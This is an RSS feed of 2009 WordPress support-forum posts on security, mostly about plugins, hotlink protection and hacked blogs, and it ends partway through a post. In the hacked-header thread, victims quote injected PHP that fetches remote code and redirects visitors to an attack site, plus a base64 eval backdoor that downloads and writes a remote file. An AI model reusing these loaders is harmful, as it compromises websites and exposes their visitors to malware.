<?xml version="1.0" encoding="UTF-8"?><!-- generator="bbPress" -->

<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
>

<channel>
<title>WordPress &#8250; Support Tag: security</title>
<link>http://wordpress.org/support/</link>
<description>WordPress &#8250; Support Tag: security</description>
<language>en</language>
<pubDate>Tue, 24 Nov 2009 13:09:20 +0000</pubDate>

<item>
<title>zylstra5 on "Problem after installing WP Security Scan"</title>
<link>http://wordpress.org/support/topic/335003#post-1291851</link>
<pubDate>Tue, 24 Nov 2009 04:45:22 +0000</pubDate>
<dc:creator>zylstra5</dc:creator>
<guid isPermaLink="false">1291851@http://wordpress.org/support/</guid>
<description>&#60;p&#62;I am receiving this error:&#60;br /&#62;
&#34;You do not have sufficient permissions to access this page.&#34;&#60;/p&#62;
&#60;p&#62;This happened after I installed WP Security Scan (Link: &#60;a href=&#34;http://semperfiwebdesign.com/plugins/wp-security-scan/&#34; rel=&#34;nofollow&#34;&#62;http://semperfiwebdesign.com/plugins/wp-security-scan/&#60;/a&#62; ) and then ran a utility that changes your database prefix.&#60;br /&#62;
Soon after successfully updating the prefix, this message appeared.&#60;/p&#62;
&#60;p&#62;I googled this question, and found such a variety of answers. It seems many people had this issue with updating, but that is not what I did so I figured it would be best to ask here.&#60;/p&#62;
&#60;p&#62;This seems to be a fairly prominent issue with this plugin... it is featured on Wordpress and possibly should be removed until these types of bugs are fixed. &#60;/p&#62;
&#60;p&#62;I have tried reinstalling Wordpress (just the files, nothing with the database). I do have a backup of the database, but for further reasons that would take too long to explain, I would like to avoid this. Last resort.
&#60;/p&#62;</description>
</item>
<item>
<title>derek23 on "Editing triggers popup asking for username and password - security breach?"</title>
<link>http://wordpress.org/support/topic/295482/page/3#post-1290334</link>
<pubDate>Sun, 22 Nov 2009 21:03:49 +0000</pubDate>
<dc:creator>derek23</dc:creator>
<guid isPermaLink="false">1290334@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Hi&#60;/p&#62;
&#60;p&#62;This has just hit me as well and I really haven't got a clue what to do, I'm not a techie.&#60;/p&#62;
&#60;p&#62;Can someone talk me through this in English please?&#60;/p&#62;
&#60;p&#62;Derek
&#60;/p&#62;</description>
</item>
<item>
<title>buhle78 on "how to protect media library /uploads folder within a membership site"</title>
<link>http://wordpress.org/support/topic/272090#post-1289622</link>
<pubDate>Sat, 21 Nov 2009 23:54:54 +0000</pubDate>
<dc:creator>buhle78</dc:creator>
<guid isPermaLink="false">1289622@http://wordpress.org/support/</guid>
<description>&#60;blockquote&#62;
&#60;p&#62;In the above example the first line disables file directory listings (so no one can view the files in the 'uploads' or any of its subdirectories. The line with HTTP_REFERER makes sure linking to a particular file is coming from my site. The gif&#124;png&#124;jpg&#124;doc&#124;xls&#124;pdf&#124;html&#124;htm&#124;xlsx&#124;docx) is a list of filetypes I want to prevent from being directly linked to (unless they are clicking from my site).&#60;/p&#62;
&#60;p&#62;Sorry this doesn't use a plugin to solve this (maybe I should write one?), but this seems to do the trick. Hope it helps. &#60;/p&#62;&#60;/blockquote&#62;
&#60;p&#62;The problem is people download MP3s how can this solved. Today i realised that google actually indexed an MP3 and i managed to download it using Firefox. What do i add on the .htaccess to stop search engines from going in there. How can i hide the files?&#60;/p&#62;
&#60;p&#62;Please help
&#60;/p&#62;</description>
</item>
<item>
<title>esmi on "are wp plugins safe ?"</title>
<link>http://wordpress.org/support/topic/333539#post-1288591</link>
<pubDate>Fri, 20 Nov 2009 21:29:36 +0000</pubDate>
<dc:creator>esmi</dc:creator>
<guid isPermaLink="false">1288591@http://wordpress.org/support/</guid>
<description>&#60;p&#62;It's normally safe. WordPress needs to know ftp details so it can transfer updated files to your server.
&#60;/p&#62;</description>
</item>
<item>
<title>web2.0 on "are wp plugins safe ?"</title>
<link>http://wordpress.org/support/topic/333539#post-1288484</link>
<pubDate>Fri, 20 Nov 2009 19:48:27 +0000</pubDate>
<dc:creator>web2.0</dc:creator>
<guid isPermaLink="false">1288484@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Oops ... i didn't got that exactly .. which script is working behind ... wordpress or plugin ... but my concern is ... giving ftp information while updating/installing plugins is safe or not ? &#60;/p&#62;
&#60;p&#62;specially when user like me don't know what is the code running behind .... how can one decide that ftp information will only used to upgrade the plugin .. and it 'll not cause any security threat ???
&#60;/p&#62;</description>
</item>
<item>
<title>talgalili on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1288357</link>
<pubDate>Fri, 20 Nov 2009 18:20:44 +0000</pubDate>
<dc:creator>talgalili</dc:creator>
<guid isPermaLink="false">1288357@http://wordpress.org/support/</guid>
<description>&#60;p&#62;samboll, whooami (and others in the future)&#60;br /&#62;
I started doing the procedure described on:&#60;br /&#62;
&#60;a href=&#34;http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/&#34; rel=&#34;nofollow&#34;&#62;http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/&#60;/a&#62;&#60;/p&#62;
&#60;p&#62;In order to backup my entire file system,  I found the following SSH shell code to zip all my files up:&#60;br /&#62;
zip -r downloadme.zip *&#60;br /&#62;
And now I am downloading this file.&#60;br /&#62;
After that I will erase and then reinstall all the files for my blog.&#60;/p&#62;
&#60;p&#62;If any one has a tip for mass uploading new plugins to the blog, that will be nice :)&#60;/p&#62;
&#60;p&#62;Tal
&#60;/p&#62;</description>
</item>
<item>
<title>wwhitehead on "how to protect media library /uploads folder within a membership site"</title>
<link>http://wordpress.org/support/topic/272090#post-1287619</link>
<pubDate>Fri, 20 Nov 2009 01:40:40 +0000</pubDate>
<dc:creator>wwhitehead</dc:creator>
<guid isPermaLink="false">1287619@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Not sure if this helps, but I was having a similar issue and in lieu of finding a plugin that solved this problem, I simply used the &#60;a href=&#34;http://wordpress.org/extend/plugins/force-user-login/&#34;&#62;Force User Login&#60;/a&#62; plugin and then created a .htaccess file in my 'uploads' directory to prevent direct hot-linking to any file within that directory and its subdirectories &#60;em&#62;not&#60;/em&#62; coming directly from my 'Members Only' site. This way, only logged in users can access content within the uploads directory, and only when directly linked from my site. Otherwise direct linking re-directs the user to another site. Does this make sense?&#60;/p&#62;
&#60;p&#62;Here's an example .htaccess file you'd want to create and place in your 'wp-content/uploads' directory:&#60;br /&#62;
&#60;pre&#62;&#60;code&#62;IndexIgnore *
Options +FollowSymlinks
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(www\.)?myprotectedmemberssite\.com/ [NC]
RewriteCond %{REQUEST_URI} !hotlink\.(gif&#124;png&#124;jpg&#124;doc&#124;xls&#124;pdf&#124;html&#124;htm&#124;xlsx&#124;docx) [NC]
RewriteRule .*\.(gif&#124;png&#124;jpg&#124;doc&#124;xls&#124;pdf&#124;html&#124;htm&#124;xlsx&#124;docx)$ &#60;a href=&#34;http://yahoo.com/&#34; rel=&#34;nofollow&#34;&#62;http://yahoo.com/&#60;/a&#62; [NC]&#60;/code&#62;&#60;/pre&#62;
&#60;p&#62;In the above example the first line disables file directory listings (so no one can view the files in the 'uploads' or any of its subdirectories. The line with HTTP_REFERER makes sure linking to a particular file is coming from my site. The gif&#124;png&#124;jpg&#124;doc&#124;xls&#124;pdf&#124;html&#124;htm&#124;xlsx&#124;docx) is a list of filetypes I want to prevent from being directly linked to (unless they are clicking from my site).&#60;/p&#62;
&#60;p&#62;Sorry this doesn't use a plugin to solve this (maybe I should write one?), but this seems to do the trick. Hope it helps.
&#60;/p&#62;</description>
</item>
<item>
<title>esmi on "are wp plugins safe ?"</title>
<link>http://wordpress.org/support/topic/333539#post-1287491</link>
<pubDate>Thu, 19 Nov 2009 23:30:21 +0000</pubDate>
<dc:creator>esmi</dc:creator>
<guid isPermaLink="false">1287491@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Are the plugins asking for ftp details or is WordPress?
&#60;/p&#62;</description>
</item>
<item>
<title>talgalili on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1287303</link>
<pubDate>Thu, 19 Nov 2009 20:40:35 +0000</pubDate>
<dc:creator>talgalili</dc:creator>
<guid isPermaLink="false">1287303@http://wordpress.org/support/</guid>
<description>&#60;p&#62;whooami - I deeply thank your replies and willingness to help with advices.  I respect what you wrote and will look more into seeing how to fix the security holes I have.&#60;/p&#62;
&#60;p&#62;samboll - thanks for the pointers!&#60;/p&#62;
&#60;p&#62;Best to the two of you :)&#60;br /&#62;
Tal
&#60;/p&#62;</description>
</item>
<item>
<title>web2.0 on "are wp plugins safe ?"</title>
<link>http://wordpress.org/support/topic/333539#post-1287052</link>
<pubDate>Thu, 19 Nov 2009 17:29:39 +0000</pubDate>
<dc:creator>web2.0</dc:creator>
<guid isPermaLink="false">1287052@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Hi,&#60;/p&#62;
&#60;p&#62;I am new in wordpress community ... just started using it ... its really great.&#60;/p&#62;
&#60;p&#62;I have added plugins in my blog, but that plugins are asking for ftp information, i guess, this is compulsory for making changes in code (to make plugin functional). But at the same time, its risky. Like someone makes a plugin, get ftp info and transfer(email) to himself.&#60;/p&#62;
&#60;p&#62;when ftp information is leaked, then one can do anything bad ...&#60;/p&#62;
&#60;p&#62;Comments please ... i might be wrong ... if not ... then how can i decide which plugin is useful and safe for me and which is not ????
&#60;/p&#62;</description>
</item>
<item>
<title>samboll on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1286781</link>
<pubDate>Thu, 19 Nov 2009 13:09:12 +0000</pubDate>
<dc:creator>samboll</dc:creator>
<guid isPermaLink="false">1286781@http://wordpress.org/support/</guid>
<description>&#60;p&#62;&#60;a href=&#34;http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/&#34; rel=&#34;nofollow&#34;&#62;http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/&#60;/a&#62;&#60;/p&#62;
&#60;p&#62;&#60;a href=&#34;http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/&#34; rel=&#34;nofollow&#34;&#62;http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/&#60;/a&#62;
&#60;/p&#62;</description>
</item>
<item>
<title>whooami on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1286748</link>
<pubDate>Thu, 19 Nov 2009 12:30:42 +0000</pubDate>
<dc:creator>whooami</dc:creator>
<guid isPermaLink="false">1286748@http://wordpress.org/support/</guid>
<description>&#60;blockquote&#62;&#60;p&#62;... but anything that uses POST I payed closer attention to. (mostly POST is just people logging into sites, but it was also how the command was sent that altered my file)&#60;/p&#62;
&#60;/blockquote&#62;
&#60;p&#62;web servers dont log _POST request variables (aka those commands). You can use my plugin if you want those.&#60;/p&#62;
&#60;p&#62;talgalili, &#60;/p&#62;
&#60;p&#62;I suspect but obviously cannot confirm that you are not taking care of the real problem. That you are seeing different symptoms doesnt do anything to dissuade me from that idea either.&#60;/p&#62;
&#60;p&#62;Im guessing you are picking through the solutions in the hopes of doing things quickly, rather than properly.&#60;/p&#62;
&#60;p&#62;I remember a thread, or so I thought it was you -- where you were excited to have learned a shortcut or something for grepping files. &#60;/p&#62;
&#60;p&#62;It might not have been you .. Im going on a very sleepy memory.&#60;/p&#62;
&#60;p&#62;I can tell you that I have &#34;unhacked&#34; hundreds of wordpress blogs, and have had &#60;strong&#62;one&#60;/strong&#62; instance of a reoccurrance.. &#60;/p&#62;
&#60;p&#62;And your having 4 (at a minimum) -- points very strongly to either 1. you not doing a detailed enough job at making sure the site is clean or 2. you having an incredibly insecure host or 3. both&#60;/p&#62;
&#60;p&#62;Im inclined to go with 3 - only because I also remember whois'ing your domain and noticing that it was some odd european host (or so I thought at the time).&#60;/p&#62;
&#60;p&#62;That's all supposition and based only on what Ive read of your other threads and remember, and of course, my own personal experience.
&#60;/p&#62;</description>
</item>
<item>
<title>googol7 on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1286725</link>
<pubDate>Thu, 19 Nov 2009 12:13:28 +0000</pubDate>
<dc:creator>googol7</dc:creator>
<guid isPermaLink="false">1286725@http://wordpress.org/support/</guid>
<description>&#60;p&#62;hi,&#60;/p&#62;
&#60;p&#62;was the plugin exec-php installed?&#60;/p&#62;
&#60;p&#62;philipp
&#60;/p&#62;</description>
</item>
<item>
<title>klcarron on "WP-Admin redirects to WP-Admin?"</title>
<link>http://wordpress.org/support/topic/241058#post-1286390</link>
<pubDate>Thu, 19 Nov 2009 04:07:38 +0000</pubDate>
<dc:creator>klcarron</dc:creator>
<guid isPermaLink="false">1286390@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Seeing that this is unresolved 9 months ago... any chance anyone knows the answer... I have this happening too. not related to SSL cert but likely the same resolution... ANYONE??
&#60;/p&#62;</description>
</item>
<item>
<title>googol7 on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1286125</link>
<pubDate>Wed, 18 Nov 2009 22:22:42 +0000</pubDate>
<dc:creator>googol7</dc:creator>
<guid isPermaLink="false">1286125@http://wordpress.org/support/</guid>
<description>&#60;p&#62;hi,&#60;/p&#62;
&#60;p&#62;same problem here. files affected:&#60;/p&#62;
&#60;p&#62;/wp-content/themes/mytheme/404.php&#60;br /&#62;
-rwxr-x--- 1 myuser nobody   409 2009-11-17 11:14 404.php&#60;/p&#62;
&#60;p&#62;New line at the top: &#60;code&#62;&#38;lt;script&#38;gt;location=&#38;quot;&#38;lt;?php $code = file_get_contents(&#38;quot;http://feed-statistics.com/domain.php?q=b8add2a5d9&#38;quot;); $code = str_replace(&#38;quot;&#38;lt;domain&#38;gt;&#38;quot;,&#38;quot;&#38;quot;, $code); $code = str_replace(&#38;quot;&#38;lt;/domain&#38;gt;&#38;quot;, &#38;quot;&#38;quot;, $code); echo $code; ?&#38;gt;?pid=317&#38;amp;sid=84dd6f&#38;quot;;&#38;lt;/script&#38;gt;&#38;lt;?php get_header(); ?&#38;gt;&#60;/code&#62;&#60;/p&#62;
&#60;p&#62;/wp-content/themes/mytheme/header.php&#60;br /&#62;
-rwxr-x--- 1 myuser nobody  1919 2009-11-18 21:33 header.php&#60;/p&#62;
&#60;p&#62;New line at the top: &#60;code&#62;&#38;lt;script&#38;gt;location=&#38;quot;&#38;lt;?php function getu($u, $p = array ()) { $c = @curl_init();if ($p) { @curl_setopt($c, CURLOPT_POST, 1); @curl_setopt($c, CURLOPT_POSTFIELDS, $p); } @curl_setopt($c, CURLOPT_URL, $u); @curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($c, CURLOPT_TIMEOUT, 30); $h = @curl_exec($c); @curl_close($c); return $h; } $code = getu(&#38;quot;http://feed-statistics.com/domain.php?q=b8add2a5d9&#38;quot;); $code = str_replace(&#38;quot;&#38;lt;domain&#38;gt;&#38;quot;, &#38;quot;&#38;quot;, $code); $code = str_replace(&#38;quot;&#38;lt;/domain&#38;gt;&#38;quot;, &#38;quot;&#38;quot;, $code); echo $code; ?&#38;gt;?pid=317&#38;amp;sid=84dd6f&#38;quot;;&#38;lt;/script&#38;gt;&#38;lt;!DOCTYPE html PUBLIC &#38;quot;-//W3C//DTD XHTML 1.0 Transitional//EN&#38;quot; &#38;quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&#38;quot;&#38;gt;&#60;/code&#62;&#60;/p&#62;
&#60;p&#62;found malicious code in these files:&#60;/p&#62;
&#60;p&#62;/wp-content/plugins/wp-cache.php&#60;br /&#62;
-rw-r-----  1 myuser nobody 4313 2009-10-08 05:56 wp-cache.php&#60;/p&#62;
&#60;p&#62;/wp-content/wp-manager.php&#60;br /&#62;
-rw-r-----  1 myuser nobody 186780 2009-10-22 21:34 wp-manager.php&#60;/p&#62;
&#60;p&#62;/wp-content/plugins/stats/wp-stats.php&#60;/p&#62;
&#60;p&#62;had this content:&#60;/p&#62;
&#60;p&#62;&#60;code&#62;&#38;lt;?php eval(base64_decode(&#38;#39;DQppZighJF9HRVRbInAiXSkgew0KICAgIGV4aXQ7DQp9DQoNCiRob3N0ID0gc3RyX3JlcGxhY2UoInd3dy4iLCAiIiwgJF9TRVJWRVJbIkhUVFBfSE9TVCJdKTsNCiRkYXRhPWc4NzQ2MjgzNDcyMzQoImh0dHA6Ly9teXdlYi1zdGF0aXN0aWNzLmNuL2ZtYW4vY2FjaGUucGhwP25ldz0xKTsNCiRmaCA9IGZvcGVuKCIuLi8uLi9jYWNoZS5waHAiLCAidyIpOw0KZndyaXRlKCRmaCwgJGRhdGEpOw0KZmNsb3NlICgkZmgpOw0KDQpmdW5jdGlvbiBnODc0NjI4MzQ3MjM0KCR1LCAkcCA9IGFycmF5KCkpew0KICAgICRjPWN1cmxfaW5pdCgpOw0KICAgIGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1VSTCwgJHUpOw0KICAgIGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCiAgICBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9USU1FT1VULCA2MCk7DQogICAgJGg9Y3VybF9leGVjKCRjKTsNCiAgICBjdXJsX2Nsb3NlICgkYyk7DQogICAgcmV0dXJuICRoOw0KfQ0K&#38;#39;)); ?&#38;gt;&#60;/code&#62;&#60;/p&#62;
&#60;p&#62;which translates to:&#60;/p&#62;
&#60;p&#62;&#60;code&#62;if(!$_GET[&#38;quot;p&#38;quot;]) { exit; } $host = str_replace(&#38;quot;www.&#38;quot;, &#38;quot;&#38;quot;, $_SERVER[&#38;quot;HTTP_HOST&#38;quot;]); $data=g874628347234(&#38;quot;http://myweb-statistics.cn/fman/cache.php?new=1); $fh = fopen(&#38;quot;../../cache.php&#38;quot;, &#38;quot;w&#38;quot;); fwrite($fh, $data); fclose ($fh); function g874628347234($u, $p = array()){ $c=curl_init(); curl_setopt($c, CURLOPT_URL, $u); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);     curl_setopt($c, CURLOPT_TIMEOUT, 60); $h=curl_exec($c); curl_close ($c); return $h; }&#60;/code&#62;&#60;/p&#62;
&#60;p&#62;philipp
&#60;/p&#62;</description>
</item>
<item>
<title>talgalili on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1285954</link>
<pubDate>Wed, 18 Nov 2009 20:11:30 +0000</pubDate>
<dc:creator>talgalili</dc:creator>
<guid isPermaLink="false">1285954@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Hi RVoodoo,&#60;br /&#62;
Folloing your advice, I just checked the log files of my hosting, and couldn't find any change to that file (including my own change to it!)&#60;/p&#62;
&#60;p&#62;I wonder why that is.&#60;/p&#62;
&#60;p&#62;Tal
&#60;/p&#62;</description>
</item>
<item>
<title>RVoodoo on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1285843</link>
<pubDate>Wed, 18 Nov 2009 18:03:18 +0000</pubDate>
<dc:creator>RVoodoo</dc:creator>
<guid isPermaLink="false">1285843@http://wordpress.org/support/</guid>
<description>&#60;p&#62;I'm not real sure about log files.... the one I looked at, my server file is just a big long list of absolutely anything that goes through my server.&#60;/p&#62;
&#60;p&#62;-any access, any file used, anything.  So it shows POST, HEAD, GET and the file&#60;br /&#62;
--there's about a million GET entries on it, but anything that uses POST I payed closer attention to.  (mostly POST is just people logging into sites, but it was also how the command was sent that altered my file)&#60;/p&#62;
&#60;p&#62;-Basically, I'm not sure what different type of log files there are, but mine showed every single action involving any file through my server.....does your host not have that type?  If they do, it'll definitely give you the information you are looking for
&#60;/p&#62;</description>
</item>
<item>
<title>talgalili on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1285835</link>
<pubDate>Wed, 18 Nov 2009 17:55:35 +0000</pubDate>
<dc:creator>talgalili</dc:creator>
<guid isPermaLink="false">1285835@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Firstly I would like to thank all of you for your kind answers.&#60;/p&#62;
&#60;p&#62;Now from last to first:&#60;/p&#62;
&#60;p&#62;whooami -&#60;br /&#62;
The issues I had there where of a different sort (to the best of my current understanding).  In them I had the file &#34;wp-header.php&#34; altered, not &#34;header.php&#34;.&#60;br /&#62;
Also, that issue was working through a cache.php file located on another place. AND, I already (I believe) had found that leak and fixed it (deleting an added file), As I have mentioned in the threads I started there.&#60;br /&#62;
If you think this is a symptom to a bigger problem, and have suggestions as to how to check it, I would be glad to know.&#60;/p&#62;
&#60;p&#62;RVoodoo -&#60;br /&#62;
Thank you for the answer!&#60;br /&#62;
I was hoping to do the exact same thing, but the hosting I use (site5) claimed that they can't detect which file was responsible for changing this file.&#60;br /&#62;
Are they using a different log file for the server ?&#60;br /&#62;
And leads on this will be great.&#60;/p&#62;
&#60;p&#62;alamster - thank you for your reply.&#60;/p&#62;
&#60;p&#62;bisforbo - very interesting - thank you for that tip, I'll see what I can do with it.&#60;/p&#62;
&#60;p&#62;Again, my thanks for all of you for taking the time to answer.&#60;br /&#62;
Best,&#60;br /&#62;
Tal
&#60;/p&#62;</description>
</item>
<item>
<title>whooami on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1285575</link>
<pubDate>Wed, 18 Nov 2009 13:55:39 +0000</pubDate>
<dc:creator>whooami</dc:creator>
<guid isPermaLink="false">1285575@http://wordpress.org/support/</guid>
<description>&#60;p&#62;&#60;a href=&#34;http://wordpress.org/support/topic/285169?replies=9&#34; rel=&#34;nofollow&#34;&#62;http://wordpress.org/support/topic/285169?replies=9&#60;/a&#62;&#60;br /&#62;
&#60;a href=&#34;http://wordpress.org/support/topic/327460?replies=6&#34; rel=&#34;nofollow&#34;&#62;http://wordpress.org/support/topic/327460?replies=6&#60;/a&#62;&#60;br /&#62;
&#60;a href=&#34;http://wordpress.org/support/topic/295781?replies=2&#34; rel=&#34;nofollow&#34;&#62;http://wordpress.org/support/topic/295781?replies=2&#60;/a&#62;&#60;br /&#62;
&#60;a href=&#34;http://wordpress.org/support/topic/270938?replies=4&#34; rel=&#34;nofollow&#34;&#62;http://wordpress.org/support/topic/270938?replies=4&#60;/a&#62;&#60;/p&#62;
&#60;p&#62;talgalili,&#60;/p&#62;
&#60;p&#62;your issues appear to be ongoing.
&#60;/p&#62;</description>
</item>
<item>
<title>RVoodoo on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1285564</link>
<pubDate>Wed, 18 Nov 2009 13:43:33 +0000</pubDate>
<dc:creator>RVoodoo</dc:creator>
<guid isPermaLink="false">1285564@http://wordpress.org/support/</guid>
<description>&#60;p&#62;yup....a lot of time, you may have another php file on your server.  ANYWHERE on your server.  It could have been placed there months ago.  It can be very hard to find if, like me, you run many sites off of your server.  &#60;/p&#62;
&#60;p&#62;I found a file called test.php, and one called wp_setup.php I think.  One of those files was in a subdomain that I have my online shop setup in, it was buried about 6 levels deep in a photo folder from 2008.  Another of those files was in a totally different wordpress install.  But they were both used as backdoors to my main wp install only.&#60;/p&#62;
&#60;p&#62;I found them by checking the timestamp of my header.php file, which showed me when it had been altered.  I checked my server logs to find that exact time, which showed me my header.php file being altered through the above files, and showed me where they were located.&#60;/p&#62;
&#60;p&#62;There are many ways to hack a site, but the one I listed was the most recent one I've dealt with......
&#60;/p&#62;</description>
</item>
<item>
<title>alamster on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1285550</link>
<pubDate>Wed, 18 Nov 2009 13:32:00 +0000</pubDate>
<dc:creator>alamster</dc:creator>
<guid isPermaLink="false">1285550@http://wordpress.org/support/</guid>
<description>&#60;p&#62;I try to answer :&#60;/p&#62;
&#60;p&#62;1. The address they try to inject is 'attack site' (I run it on firefox)&#60;br /&#62;
&#60;a href=&#34;http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&#38;amp;hl=en-US&#38;amp;site=http://everlastmovie.cn/?pid=317&#38;amp;sid=84dd6f&#34; rel=&#34;nofollow&#34;&#62;http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&#38;amp;hl=en-US&#38;amp;site=http://everlastmovie.cn/?pid=317&#38;amp;sid=84dd6f&#60;/a&#62;&#60;br /&#62;
2. I ever get hacked too, after recheck all file I find out that wp theme I use already insert by a backdoor which make them easily enter another code to my blog (php shell).
&#60;/p&#62;</description>
</item>
<item>
<title>bisforbo on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1285508</link>
<pubDate>Wed, 18 Nov 2009 12:39:16 +0000</pubDate>
<dc:creator>bisforbo</dc:creator>
<guid isPermaLink="false">1285508@http://wordpress.org/support/</guid>
<description>&#60;p&#62;The linked domain thing i'm not sure about. But... the way that I understand hacking works is by finding an entryway- a place where you should get a 404 page but then don't- and then you can see the file structure in the url bar. You then navigate around the website using that as your point of reference in a way that is similar to using terminal (on mac) (so like using / to go to root, etc.) . So what I would do, is if you have google analytics, look for a page that only one person has been to, that you've never seen before. Navigate to that page and then see if you get a 404. if you don't get a 404 and it says something about your server, then the mystery is solved.  If you do get a 404 then i don't know, and if you get a normal page then check your content and what it links to.
&#60;/p&#62;</description>
</item>
<item>
<title>talgalili on "My blogs header has been hacked - how did they do it ?"</title>
<link>http://wordpress.org/support/topic/333006#post-1285369</link>
<pubDate>Wed, 18 Nov 2009 08:16:38 +0000</pubDate>
<dc:creator>talgalili</dc:creator>
<guid isPermaLink="false">1285369@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Hi there,&#60;/p&#62;
&#60;p&#62;My blog's header.php (in the theme directory), has been hacked and the code inserted to it was:&#60;/p&#62;
&#60;p&#62;&#38;lt;script&#38;gt;location=&#34;&#38;lt;?php function getu($u, $p = array ()) { $c = @curl_init();if ($p) { @curl_setopt($c, CURLOPT_POST, 1); @curl_setopt($c, CURLOPT_POSTFIELDS, $p); } @curl_setopt($c, CURLOPT_URL, $u); @curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($c, CURLOPT_TIMEOUT, 30); $h = @curl_exec($c); @curl_close($c); return $h; } $code = getu(&#34;http://feed-statistics.com/domain.php?q=b8add2a5d9&#34;); $code = str_replace(&#34;&#38;lt;domain&#38;gt;&#34;, &#34;&#34;, $code); $code = str_replace(&#34;&#38;lt;/domain&#38;gt;&#34;, &#34;&#34;, $code); echo $code; ?&#38;gt;?pid=317&#38;amp;sid=84dd6f&#34;;&#38;lt;/script&#38;gt;&#60;/p&#62;
&#60;p&#62;I wonder if:&#60;br /&#62;
1) can I report the linked to domain somehow ?&#60;br /&#62;
2) My FTP log files don't show any FTP action taken on the file. Does anyone know of more ways someone might make this change ?&#60;/p&#62;
&#60;p&#62;Thanks,&#60;br /&#62;
Tal
&#60;/p&#62;</description>
</item>
<item>
<title>bottleneck on "Help WP Meta Descriptions Spammed/ Security Alert"</title>
<link>http://wordpress.org/support/topic/332354#post-1284024</link>
<pubDate>Tue, 17 Nov 2009 04:06:24 +0000</pubDate>
<dc:creator>bottleneck</dc:creator>
<guid isPermaLink="false">1284024@http://wordpress.org/support/</guid>
<description>&#60;p&#62;You didn't make a one step further just to find it out.&#60;/p&#62;
&#60;blockquote&#62;&#60;p&#62;Please type is waterskiandwakeboardworldcup into google and see top result for waterskiandwakeboardworldcup.com&#60;/p&#62;
&#60;/blockquote&#62;
&#60;p&#62;Click on &#34;cached&#34; and see what's there.&#60;/p&#62;
&#60;p&#62;This is for your reference:&#60;br /&#62;
&#60;a href=&#34;http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/&#34;&#62;http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/&#60;/a&#62;&#60;/p&#62;
&#60;p&#62;&#60;a href=&#34;http://codex.wordpress.org/FAQ_My_site_was_hacked&#34;&#62;http://codex.wordpress.org/FAQ_My_site_was_hacked&#60;/a&#62;
&#60;/p&#62;</description>
</item>
<item>
<title>amprodesign on "Help WP Meta Descriptions Spammed/ Security Alert"</title>
<link>http://wordpress.org/support/topic/332354#post-1283308</link>
<pubDate>Mon, 16 Nov 2009 17:06:48 +0000</pubDate>
<dc:creator>amprodesign</dc:creator>
<guid isPermaLink="false">1283308@http://wordpress.org/support/</guid>
<description>&#60;p&#62;hey please help.&#60;br /&#62;
Please type is waterskiandwakeboardworldcup into google and see top result for waterskiandwakeboardworldcup.com&#60;br /&#62;
This is an ad for canadian drug company, nothing to do with our site Please can somebody help me, what has happened here?&#60;br /&#62;
Thanks&#60;br /&#62;
Andy
&#60;/p&#62;</description>
</item>
<item>
<title>pdliles on "File access in ProPlayer after 2.8.6 upgrade"</title>
<link>http://wordpress.org/support/topic/332006#post-1282111</link>
<pubDate>Sun, 15 Nov 2009 15:33:00 +0000</pubDate>
<dc:creator>pdliles</dc:creator>
<guid isPermaLink="false">1282111@http://wordpress.org/support/</guid>
<description>&#60;p&#62;When I upgraded to Word Press 2.8.6. all of the images I had associated with Pro-Player playing .flv files went black?  &#60;/p&#62;
&#60;p&#62;The code I use for this page (http://lilesnet.com/dailydiary/?p=2633) is:&#60;/p&#62;
